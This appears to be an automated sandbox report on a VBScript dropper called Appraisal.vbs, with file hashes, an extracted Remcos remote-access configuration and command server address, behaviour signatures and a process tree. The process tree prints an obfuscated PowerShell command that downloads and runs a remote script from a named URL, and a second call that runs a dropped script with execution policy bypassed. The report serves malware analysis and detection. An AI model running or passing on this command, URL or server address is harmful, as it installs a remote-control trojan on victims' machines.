Analysis
-
max time kernel
150s -
max time network
146s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
25-04-2021 15:01
General
-
Target
Appraisal.vbs
-
Size
713B
-
MD5
374872083b769268ef5be044031e72cf
-
SHA1
ccb15dd8642387523121e8c67bb8fa41b2b2f966
-
SHA256
5f06da67169389577ec237bfb0c3e0e9203833048f48081deed7b6201ad18c27
-
SHA512
5b97e908e39d61decb10a0b2bdf9d94043d899b86052fcedd598d87a7a610d977b526c5176c91b7bdecacb1a1eb3f39ce3bab9547c253e2b4e17c837dc50de58
Malware Config
Extracted
https://ia601403.us.archive.org/17/items/all_20210425_202104/ALL.TXT
Extracted
remcos
185.19.85.168:1723
Signatures
-
Remcos
Remcos is a closed-source remote control and surveillance software.
-
Blocklisted process makes network request 3 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 16 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Appraisal.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I`E`X((n`e`W`-Obj`E`c`T(('Net'+'.'+'Webc'+'lient'))).(('D'+'o'+'w'+'n'+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).InVokE((('https://ia601403.us.archive.org/17/items/all_20210425_202104/ALL.TXT'))))2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windo 1 -noexit -exec bypass -file "C:\Users\Public\ Microsoft.ps1"3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe#cmd4⤵
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Public\ Microsoft.ps1MD5
ab9f802581d1bbbcafb0cb1f9a3a002f
SHA1a53f6e8d357edd39060bd4842e448f2c84571b86
SHA25636fa91c5bfae97b2c9945b055384297afaf148f2becd50e0ce270276ca472855
SHA5123732785a36fa3c7a8a51969b6fe31da69f19a8d68cd8789236806d81a2bc2d70007b2459d4b739790fd7592c954d9b186e048ddec34c1d3ff6a5c5810cf21621
-
memory/660-187-0x0000017C82266000-0x0000017C82268000-memory.dmpFilesize
8KB
-
memory/660-181-0x0000017C9C5B0000-0x0000017C9C5CF000-memory.dmpFilesize
124KB
-
memory/660-186-0x0000017C9C5D0000-0x0000017C9C5D1000-memory.dmpFilesize
4KB
-
memory/660-160-0x0000017C82260000-0x0000017C82262000-memory.dmpFilesize
8KB
-
memory/660-161-0x0000017C82263000-0x0000017C82265000-memory.dmpFilesize
8KB
-
memory/660-137-0x0000000000000000-mapping.dmp
-
memory/660-164-0x0000017C9C950000-0x0000017C9C951000-memory.dmpFilesize
4KB
-
memory/1536-121-0x0000022338190000-0x0000022338192000-memory.dmpFilesize
8KB
-
memory/1536-132-0x0000022338196000-0x0000022338198000-memory.dmpFilesize
8KB
-
memory/1536-120-0x00000223527F0000-0x00000223527F1000-memory.dmpFilesize
4KB
-
memory/1536-127-0x00000223529A0000-0x00000223529A1000-memory.dmpFilesize
4KB
-
memory/1536-114-0x0000000000000000-mapping.dmp
-
memory/1536-122-0x0000022338193000-0x0000022338195000-memory.dmpFilesize
8KB
-
memory/3980-188-0x000000000042EEEF-mapping.dmp
-
memory/3980-189-0x0000000000400000-0x0000000000478000-memory.dmpFilesize
480KB